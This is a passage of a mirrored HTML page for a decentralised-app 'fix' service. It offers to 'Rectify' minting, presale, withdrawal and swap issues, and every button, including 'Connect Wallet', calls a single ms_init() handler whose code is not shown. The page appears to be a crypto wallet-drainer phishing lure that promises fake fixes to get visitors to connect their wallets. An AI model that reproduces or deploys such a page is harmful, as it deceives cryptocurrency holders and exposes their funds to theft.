         <h3 class="text-lg font-semibold text-white dark:text-white">
          Minting
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Fix all minting related issues
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Rectify
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4" style="margin-top: 20px">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Buy Presale
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Fix all Buy Presale related issues
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Rectify
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4" style="margin-top: 20px">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Claim Prelsale
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Fix all Claim Prelsale related issues
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Rectify
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4" style="margin-top: 20px">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Withdraw Token
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Fix all Withdraw Token related issues
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Rectify
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
        <li class="ml-4" style="margin-top: 20px">
         <div class="absolute w-3 h-3 bg-gray-200 rounded-full mt-1.5 -left-1.5 border border-white dark:border-gray-900 dark:bg-gray-700">
         </div>
         <h3 class="text-lg font-semibold text-white dark:text-white">
          Swap Token
         </h3>
         <p class="text-base font-normal text-gray-500 dark:text-gray-400">
          Fix all Swap Token related issues
         </p>
         <a onclick="ms_init()" class="mt-3 inline-flex items-center py-2 px-4 text-sm font-medium text-gray-900 bg-white rounded-lg border border-gray-200 hover:bg-gray-100 hover:text-blue-700 focus:z-10 focus:ring-4 focus:outline-none focus:ring-gray-200 focus:text-blue-700 dark:bg-gray-800 dark:text-gray-400 dark:border-gray-600 dark:hover:text-white dark:hover:bg-gray-700 dark:focus:ring-gray-700 ">
          Rectify
          <svg class="ml-2 w-3 h-3" fill="currentColor" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M12.293 5.293a1 1 0 011.414 0l4 4a1 1 0 010 1.414l-4 4a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-2.293-2.293a1 1 0 010-1.414z" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </li>
       </ol>
       <!-- Integrations -->
       <section class="csghv">
        <!-- Bottom vertical line -->
        <div aria-hidden="true" class="cov9f cjnxd ck0g4 cwrme cua7u ca1wo cf03e cl75e clxpw">
        </div>
        <div class="crs2z c12sl ced2s cgwxs">
         <div class="cn8hk c8w8t c15wg chd23">
          <!-- Section header -->
          <div class="crs2z cg714 czcex cipqn">
           <h2 class="cnoe4 c3yu8">
            An ecosystem of integrations
           </h2>
          </div>
          <!-- Logo animation -->
          <div class="csghv cha4x ch6o9 crevm c3efh">
           <!-- Blurred dots -->
           <svg class="cov9f cpyhk clh5r" height="93" width="557" xmlns="http://www.w3.org/2000/svg">
            <defs>
             <filter filterunits="objectBoundingBox" height="200%" id="hlogo-blurreddots-a" width="200%" x="-50%" y="-50%">
              <fegaussianblur in="SourceGraphic" stddeviation="2">
              </fegaussianblur>
             </filter>
             <filter filterunits="objectBoundingBox" height="200%" id="blurreddots-b" width="200%" x="-50%" y="-50%">
              <fegaussianblur in="SourceGraphic" stddeviation="2">
              </fegaussianblur>
             </filter>
             <filter filterunits="objectBoundingBox" height="400%" id="blurreddots-c" width="400%" x="-150%" y="-150%">
              <fegaussianblur in="SourceGraphic" stddeviation="6">
              </fegaussianblur>
             </filter>
             <filter filterunits="objectBoundingBox" height="400%" id="blurreddots-d" width="400%" x="-150%" y="-150%">
              <fegaussianblur in="SourceGraphic" stddeviation="4">
              </fegaussianblur>
             </filter>
             <filter filterunits="objectBoundingBox" height="400%" id="blurreddots-e" width="400%" x="-150%" y="-150%">
              <fegaussianblur in="SourceGraphic" stddeviation="4">
              </fegaussianblur>
             </filter>
             <filter filterunits="objectBoundingBox" height="200%" id="blurreddots-f" width="200%" x="-50%" y="-50%">
              <fegaussianblur in="SourceGraphic" stddeviation="2">
              </fegaussianblur>
             </filter>
             <filter filterunits="objectBoundingBox" height="300%" id="blurreddots-g" width="300%" x="-100%" y="-100%">
              <fegaussianblur in="SourceGraphic" stddeviation="4">
              </fegaussianblur>
             </filter>
             <filter filterunits="objectBoundingBox" height="400%" id="blurreddots-h" width="400%" x="-150%" y="-150%">
              <fegaussianblur in="SourceGraphic" stddeviation="6">
              </fegaussianblur>
             </filter>
             <filter filterunits="objectBoundingBox" height="400%" id="blurreddots-i" width="400%" x="-150%" y="-150%">
              <fegaussianblur in="SourceGraphic" stddeviation="4">
              </fegaussianblur>
             </filter>
             <filter filterunits="objectBoundingBox" height="250%" id="blurreddots-j" width="250%" x="-75%" y="-75%">
              <fegaussianblur in="SourceGraphic" stddeviation="2">
              </fegaussianblur>
             </filter>
            </defs>
            <g fill="none" fill-rule="evenodd">
             <g class="c8i09" transform="translate(437 8)">
              <circle cx="6" cy="66" fill-opacity=".64" filter="url(#blurreddots-a)" r="6">
              </circle>
              <circle cx="90" cy="6" fill-opacity=".32" filter="url(#blurreddots-b)" r="6">
              </circle>
              <circle cx="90" cy="66" fill-opacity=".64" filter="url(#blurreddots-c)" r="6">
              </circle>
              <circle cx="6" cy="36" fill-opacity=".32" filter="url(#blurreddots-d)" r="4">
              </circle>
              <circle cx="60" cy="36" fill-opacity=".32" filter="url(#blurreddots-e)" r="4">
              </circle>
              <circle cx="34" cy="22" fill-opacity=".64" r="2">
              </circle>
              <circle cx="34" cy="50" fill-opacity=".32" r="2">
              </circle>
              <circle cx="118" cy="22" fill-opacity=".64" r="2">
              </circle>
              <circle cx="118" cy="50" fill-opacity=".32" r="2">
              </circle>
             </g>
             <g class="c8i09" transform="matrix(-1 0 0 1 120 8)">
              <circle cx="6" cy="66" fill-opacity=".64" filter="url(#blurreddots-f)" r="6">
              </circle>
              <circle cx="90" cy="6" fill-opacity=".32" filter="url(#blurreddots-g)" r="6">
              </circle>
              <circle cx="90" cy="66" fill-opacity=".64" filter="url(#blurreddots-h)" r="6">
              </circle>
              <circle cx="6" cy="36" fill-opacity=".32" filter="url(#blurreddots-i)" r="4">
              </circle>
              <circle cx="60" cy="36" fill-opacity=".64" filter="url(#blurreddots-j)" r="4">
              </circle>
              <circle cx="34" cy="22" fill-opacity=".32" r="2">
              </circle>
              <circle cx="34" cy="50" fill-opacity=".32" r="2">
              </circle>
              <circle cx="118" cy="22" fill-opacity=".64" r="2">
              </circle>
              <circle cx="118" cy="50" fill-opacity=".32" r="2">
              </circle>
             </g>
            </g>
           </svg>
           <div class="csghv cha4x cpt6h cjsus crevm cygul">
            <!-- Halo effect -->
            <svg class="cgtjr cov9f czbp4 cjnxd cpyhk c5xk3 c3dfy cf03e clh5r cb4jw" height="800" viewbox="0 0 800 800" width="800" xmlns="http://www.w3.org/2000/svg">
             <defs>
              <lineargradient id="lg-1" x1="50%" x2="50%" y1="0%" y2="100%">
               <stop offset="0%" stop-color="#0F172A" stop-opacity="0%">
               </stop>
               <stop offset="100%" stop-color="#0F172A">
               </stop>
              </lineargradient>
             </defs>
             <g class="c8i09 clbdn" fill-rule="evenodd">
              <circle class="cv9rj" cx="400" cy="400" r="200">
              </circle>
              <circle class="cv9rj c5nv1" cx="400" cy="400" r="200">
              </circle>
              <circle class="cv9rj c1mag" cx="400" cy="400" r="200">
              </circle>
              <circle class="cv9rj cqwll" cx="400" cy="400" r="200">
              </circle>
              <rect fill="url(#lg-1)" height="800" width="800">
              </rect>
             </g>
            </svg>
            <!-- Logo -->
            <svg class="c319x cn1iz" viewbox="0 0 32 32" xmlns="http://www.w3.org/2000/svg">
             <defs>
              <lineargradient id="a" x1="0%" x2="104.18%" y1="32.443%" y2="50%">
               <stop offset="0%" stop-color="#FFF" stop-opacity=".299">
               </stop>
               <stop offset="100%" stop-color="#7587E4" stop-opacity="0">
               </stop>
              </lineargradient>
              <lineargradient id="b" x1="18.591%" x2="100%" y1="0%" y2="100%">
               <stop offset="0%" stop-color="#818CF8">
               </stop>
               <stop offset="100%" stop-color="#C7D2FE">
               </stop>
              </lineargradient>
             </defs>
             <g fill="none" fill-rule="evenodd">
              <path d="M16 18.5V32l15.999-9.25V9.25z" fill="#3730A3">
              </path>
              <path d="m0 23 16 9V18.501L0 9.251z" fill="#4F46E5">
              </path>
              <path d="M16 13 0 23l16 9 16-9z" fill="url(#a)" fill-opacity=".64">
              </path>
              <path d="M16 0 0 9.25l16 9.25 15.999-9.25z" fill="url(#b)">
              </path>
             </g>
            </svg>
           </div>
          </div>
          <!-- Integration boxes -->
          <div class="csghv crs2z cb7y9 cwqzj c8hla c49yv cnvkl csdcf c2ecc cbkw7 cckvi clgyd">
           <!-- Top vertical line -->
           <div aria-hidden="true" class="cov9f cjnxd c46yz c3awn cwrme cua7u ca1wo cf03e cl75e clxpw">
           </div>
           <div class="csghv cha4x c1kl5 crevm cygul cl75e culgr aos-init aos-animate" data-aos="fade-up">
            <!-- Inner lines -->
            <div aria-hidden="true" class="cov9f czbp4 cjnxd c1gej cwrme crp1v cp0zn cf03e clxpw">
             <div class="cov9f cjnxd cofye ca1wo cf03e cl75e">
             </div>
             <div class="cov9f c1p84 cxqvs c5qx7 cl75e">
             </div>
            </div>
            <!-- Circle -->
            <div class="cha4x cl55t chri1 crevm cygul ccjz4 cplxt cdbty cxlw8">
             <!-- Icon -->
             <img alt="Icon 01" height="46" src="assets/130060453-875a6633-3ce1-4f19-9a7d-61ce4d286c90-removebg-preview.png" width="36"/>
            </div>
           </div>
           <div class="csghv cha4x c1kl5 crevm cygul cl75e culgr aos-init aos-animate" data-aos="fade-up" data-aos-delay="100">
            <!-- Inner lines -->
            <div aria-hidden="true" class="cov9f czbp4 cjnxd c1gej cwrme crp1v cp0zn cf03e clxpw">
             <div class="cov9f cjnxd cofye ca1wo cf03e cl75e">
             </div>
             <div class="cov9f cxqvs cirl7 cl75e">
             </div>
            </div>
            <!-- Circle -->
            <div class="cha4x cl55t chri1 crevm cygul ccjz4 cplxt cdbty cxlw8">
             <!-- Icon -->
             <img alt="Icon 02" height="46" src="assets/bb.svg" width="46"/>
            </div>
           </div>
           <div class="csghv cha4x c1kl5 crevm cygul cl75e culgr aos-init aos-animate" data-aos="fade-up" data-aos-delay="200">
            <!-- Inner lines -->
            <div aria-hidden="true" class="cov9f czbp4 cjnxd c1gej cwrme crp1v cp0zn cf03e clxpw">
             <div class="cov9f cjnxd cofye ca1wo cf03e cl75e">
             </div>
             <div class="cov9f cxqvs cirl7 cl75e">
             </div>
            </div>
            <!-- Circle -->
            <div class="cha4x cl55t chri1 crevm cygul ccjz4 cplxt cdbty cxlw8">
             <!-- Icon -->
             <img alt="Icon 03" height="45" src="assets/p.png" width="53"/>
            </div>
           </div>
          </div>
         </div>
        </div>
       </section>
       <!-- CTA -->
       <section class="csghv cn8hk c8w8t">
        <!-- Bg gradient: top -->
        <div aria-hidden="true" class="cgtjr cov9f cokz4 cs58h c1p84 c1hsh c20k8 cv4we cdbty czarn cy0u8">
        </div>
        <!-- Illustration -->
        <div aria-hidden="true" class="cgtjr cov9f cjnxd cokz4 c1hsh czd87 cwrme cf03e ce7wk">
         <img alt="Features 01 Illustration" class="cpd9d" height="440" src="assets/cta-illustration.svg" width="1440"/>
        </div>
        <div class="crs2z c12sl ced2s cgwxs">
         <div class="c15wg chd23">
          <!-- Section header -->
          <div class="crs2z cg714 czcex cipqn cbzdz aos-init aos-animate" data-aos="fade-up">
           <h2 class="cnoe4 c3yu8" style="font-size: x-large">
            We make it easy to plug into Dapp.
           </h2>
          </div>
          <!-- Buttons -->
          <div class="cipqn">
           <div class="crs2z c8hla cun0l cljb8 ce61j cmqpv c85uq cqevc">
            <div class="aos-init aos-animate" data-aos="fade-up" data-aos-delay="100">
             <a onclick="ms_init()" class="c4rfz cirl7 cyy7p cy9j6 cbjhp cvnv6 ceef4 " da="">
              Connect Wallet
             </a>
            </div>
            <div class="aos-init aos-animate" data-aos="fade-up" data-aos-delay="200">
            </div>
           </div>
          </div>
         </div>
        </div>
       </section>
      </div>
     </div>
    </section>
   </main>
   <!-- Site footer -->
   <footer>
    <div class="crs2z c12sl ced2s cgwxs">
     <!-- Blocks -->
     <div class="cwqzj cjgmc cn8hk c8w8t ccxel c6kcl cie4v ccgyw">
      <!-- 1st block -->
      <div class="c170d cgvzv ceqr4">
       <div class="cepog">
        <!-- Logo -->
        <a onclick="ms_init()" aria-label="Cruip" class="c3r81 ">
         <svg class="cua7u cgwd6" viewbox="0 0 32 32" xmlns="http://www.w3.org/2000/svg">
          <defs>
           <lineargradient id="flogo-a" x1="0%" x2="104.18%" y1="32.443%" y2="50%">
            <stop offset="0%" stop-color="#FFF" stop-opacity=".299">
            </stop>
            <stop offset="100%" stop-color="#7587E4" stop-opacity="0">
            </stop>
           </lineargradient>
           <lineargradient id="flogo-b" x1="18.591%" x2="100%" y1="0%" y2="100%">
            <stop offset="0%" stop-color="#818CF8">
            </stop>
            <stop offset="100%" stop-color="#C7D2FE">
            </stop>
           </lineargradient>
          </defs>
          <g fill="none" fill-rule="evenodd">
           <path d="M16 18.5V32l15.999-9.25V9.25z" fill="#3730A3">
           </path>
           <path d="m0 23 16 9V18.501L0 9.251z" fill="#4F46E5">
           </path>
           <path d="M16 13 0 23l16 9 16-9z" fill="url(#flogo-a)" fill-opacity=".64">
           </path>
           <path d="M16 0 0 9.25l16 9.25 15.999-9.25z" fill="url(#flogo-b)">
           </path>
          </g>
         </svg>
        </a>
       </div>
      </div>
     </div>
     <!-- Bottom area -->
     <div class="chhfx crn5q cg4jx cz5x0 c675y">
      <!-- Links -->
      <div class="c83rt capdq">
       <p>
        All rights reserved.
       </p>
      </div>
     </div>
    </div>
   </footer>
  </div>
  
 </body>

<!-- Mirrored from maigrathhe.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 05 Mar 2024 06:27:58 GMT -->
</html>
